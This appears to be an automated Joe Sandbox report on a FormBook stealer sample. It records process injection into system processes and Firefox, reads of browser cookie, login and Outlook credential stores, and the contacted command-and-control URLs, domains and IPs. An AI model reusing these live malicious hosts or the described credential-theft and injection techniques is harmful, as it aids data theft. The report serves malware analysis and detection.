Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtQueryVolumeInformationFile: Direct from: 0x77752F2C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtQuerySystemInformation: Direct from: 0x777548CC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtAllocateVirtualMemory: Direct from: 0x77752BEC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtDeviceIoControlFile: Direct from: 0x77752AEC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtCreateUserProcess: Direct from: 0x7775371C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtWriteVirtualMemory: Direct from: 0x7775490C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtQueryInformationProcess: Direct from: 0x77752C26	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtResumeThread: Direct from: 0x77752FBC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtReadVirtualMemory: Direct from: 0x77752E8C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtCreateKey: Direct from: 0x77752C6C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtSetInformationThread: Direct from: 0x77752B4C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtQueryAttributesFile: Direct from: 0x77752E6C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtAllocateVirtualMemory: Direct from: 0x77753C9C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtClose: Direct from: 0x77752B6C
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtCreateMutant: Direct from: 0x777535CC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtWriteVirtualMemory: Direct from: 0x77752E3C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtMapViewOfSection: Direct from: 0x77752D1C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtResumeThread: Direct from: 0x777536AC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtReadFile: Direct from: 0x77752ADC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtQuerySystemInformation: Direct from: 0x77752DFC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtDelayExecution: Direct from: 0x77752DDC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtAllocateVirtualMemory: Direct from: 0x77752BFC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: NULL target: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: NULL target: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\sfc.exe

Thread register set: target process: 7616

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\sfc.exe

Thread APC queued: target process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\eoIIBcxUj3.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: BE1008

Jump to behavior

Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: eoIIBcxUj3.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\sfc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\sfc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Email Collection	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	412 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
eoIIBcxUj3.exe	75%	Virustotal		Browse
eoIIBcxUj3.exe	79%	ReversingLabs	Win32.Trojan.AgentTesla
eoIIBcxUj3.exe	100%	Avira	TR/AD.Swotter.hefoh

Source	Detection	Scanner	Label
http://www.031233226.xyz/elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk	100%	Avira URL Cloud	malware
http://www.qzsazi.info/iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk	100%	Avira URL Cloud	malware
http://www.cruycq.info/0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk	100%	Avira URL Cloud	malware
http://www.sigaque.today/n61y/	100%	Avira URL Cloud	malware
http://www.l33900.xyz	100%	Avira URL Cloud	malware
http://www.l33900.xyz/gwiz/	100%	Avira URL Cloud	malware
http://www.woodsplace.net/cu04/	0%	Avira URL Cloud	safe
http://www.qzsazi.info/iwsk/	100%	Avira URL Cloud	malware
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/	0%	Avira URL Cloud	safe
http://www.cruycq.info/0vwm/	100%	Avira URL Cloud	malware
https://wx.longwaysun.com/app/register.php?site_id=2	0%	Avira URL Cloud	safe
http://www.woodsplace.net/cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk=	0%	Avira URL Cloud	safe
http://www.l33900.xyz/gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.l33900.xyz	162.218.30.235	true	false	high
www.qzsazi.info	47.83.1.90	true	false	high
woodsplace.net	13.248.213.45	true	false	high
031233226.xyz	144.76.229.203	true	false	high
www.sigaque.today	104.21.32.1	true	false	high
www.milp.store	194.9.94.85	true	false	unknown
www.cruycq.info	47.83.1.90	true	false	unknown
www.woodsplace.net	unknown	unknown	false	high
www.f66el619d.shop	unknown	unknown	false	unknown
www.elevatetextiles.net	unknown	unknown	false	high
www.vipstargold.buzz	unknown	unknown	false	high
www.kitculture.shop	unknown	unknown	false	high
www.031233226.xyz	unknown	unknown	false	high
www.alplace.site	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.031233226.xyz/elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk	false	Avira URL Cloud: malware	unknown
http://www.cruycq.info/0vwm/	false	Avira URL Cloud: malware	unknown
http://www.woodsplace.net/cu04/	true	Avira URL Cloud: safe	unknown
http://www.cruycq.info/0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk	false	Avira URL Cloud: malware	unknown
http://www.l33900.xyz/gwiz/	false	Avira URL Cloud: malware	unknown
http://www.qzsazi.info/iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk	false	Avira URL Cloud: malware	unknown
http://www.qzsazi.info/iwsk/	false	Avira URL Cloud: malware	unknown
http://www.sigaque.today/n61y/	false	Avira URL Cloud: malware	unknown
http://www.l33900.xyz/gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk	false	Avira URL Cloud: malware	unknown
http://www.woodsplace.net/cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk=	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20	sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/	sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.l33900.xyz	UJarIfYl5U.exe, 0000000B.00000002.3671463232.00000000057FE000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gemini.google.com/app?q=	sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wx.longwaysun.com/app/register.php?site_id=2	sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
144.76.229.203	031233226.xyz	Germany	24940	HETZNER-ASDE	false
13.248.213.45	woodsplace.net	United States	16509	AMAZON-02US	false
194.9.94.85	www.milp.store	Sweden	39570	LOOPIASE	false
47.83.1.90	www.qzsazi.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
104.21.32.1	www.sigaque.today	United States	13335	CLOUDFLARENETUS	false
162.218.30.235	www.l33900.xyz	United States	62587	ANT-CLOUDUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1653437
Start date and time:	2025-04-01 09:01:30 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	eoIIBcxUj3.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	c2c8b9851e807452f57cd7a1fabec3ba
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@24/6
Cookbook Comments:	Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.204.23.20, 204.79.197.222, 20.109.210.53
Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
03:03:40	API Interceptor	10402829x Sleep call for process: sfc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
144.76.229.203	March_00027290_7729.exe	Get hash	malicious	FormBook	Browse	www.031232899.xyz/do0s/
	ORDER NO_PO-001839811401_MARCH_28_2025.exe	Get hash	malicious	FormBook	Browse	www.031232899.xyz/do0s/
	ungziped_file.exe	Get hash	malicious	FormBook	Browse	www.031235246.xyz/an37/
	SC-906-GVA DESHBANDHU.exe	Get hash	malicious	FormBook	Browse	www.031235045.xyz/tjx1/
	mKv3sKQ5Q4E7waF.exe	Get hash	malicious	FormBook	Browse	www.031235045.xyz/tjx1/
	34567898765.exe	Get hash	malicious	FormBook	Browse	www.031235064.xyz/8ijm/
	Urgent Purchase Order.vbe	Get hash	malicious	FormBook	Browse	www.031235045.xyz/x35a/
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.031235064.xyz/8ijm/
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.031235064.xyz/8ijm/
	AAHiVVNIKQESryT.exe	Get hash	malicious	FormBook	Browse	www.031235045.xyz/tjx1/
13.248.213.45	RN# D7521-RN-00353 REV-2.exe	Get hash	malicious	FormBook	Browse	www.mjmegartravel.online/t2sm/
	na.doc	Get hash	malicious	FormBook	Browse	www.thecareskin.com/btrd/?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ==
	firmware.sh4.elf	Get hash	malicious	Unknown	Browse	13.248.213.45/
	irlsever.doc	Get hash	malicious	FormBook	Browse	www.microsofr.fun/omnp/
	Wk8eTHnajw.elf	Get hash	malicious	Unknown	Browse	bizvegan.com/
	Tenuto.exe	Get hash	malicious	FormBook, GuLoader, LummaC Stealer	Browse	www.osbornesargent.co.uk/md49/
194.9.94.85	ZDQZvxRL2e.exe	Get hash	malicious	FormBook	Browse	www.milp.store/4wod/
	viILoOTXYf.exe	Get hash	malicious	FormBook	Browse	www.milp.store/4wod/?Nz=tf9PV&qBo=fl5o+RjabZI4bDPOONv1k42Zlqc9nRFonSrjDDLfoFsWCi+K3/9NGbmUoc/k4l0ETdDL1GBm6/3eJIMTLCuCtP2xfyAY7zeiZfO2NGK1s/hQgU305XfS0Wg=
	yloe82Jp1k.exe	Get hash	malicious	FormBook	Browse	www.milp.store/5okx/
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	www.milp.store/5okx/?UPV=rcIZgusooP3F15rLxZDud6xXj9GvmeIMDSMXn/eRfDMVJgFB6bjmi/bQhBXB6mE8kMRzhYMkKhir5mDouZLbZHEj7q5AS4j1BqPvDeLkw5rzdSCB0A==&YrV=FlsDgRMx
	Solicitud de cotizacion.exe	Get hash	malicious	FormBook	Browse	www.milp.store/5okx/
	44EgbQcEla.exe	Get hash	malicious	FormBook	Browse	www.milp.store/5okx/
	99UbUXnwA9.exe	Get hash	malicious	FormBook	Browse	www.milp.store/5okx/
	Curriculum Vitae.exe	Get hash	malicious	FormBook	Browse	www.milp.store/5okx/
	PO-0005082025 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.milp.store/2j93/
	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.milp.store/2j93/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.l33900.xyz	sY8Sfsplzf.exe	Get hash	malicious	FormBook	Browse	162.218.30.235
	UhuGtHUgHf.exe	Get hash	malicious	FormBook	Browse	162.218.30.235
	yloe82Jp1k.exe	Get hash	malicious	FormBook	Browse	162.218.30.235
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	162.218.30.235
	Solicitud de cotizacion.exe	Get hash	malicious	FormBook	Browse	162.218.30.235
	44EgbQcEla.exe	Get hash	malicious	FormBook	Browse	162.218.30.235
	99UbUXnwA9.exe	Get hash	malicious	FormBook	Browse	162.218.30.235
	Curriculum Vitae.exe	Get hash	malicious	FormBook	Browse	162.218.30.235
	New order BPD-003777.exe	Get hash	malicious	FormBook	Browse	162.218.30.235
www.qzsazi.info	yloe82Jp1k.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	Solicitud de cotizacion.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	PO490102808.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	44EgbQcEla.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	vmEBHny0Jw.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	3MnerqRZQh.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
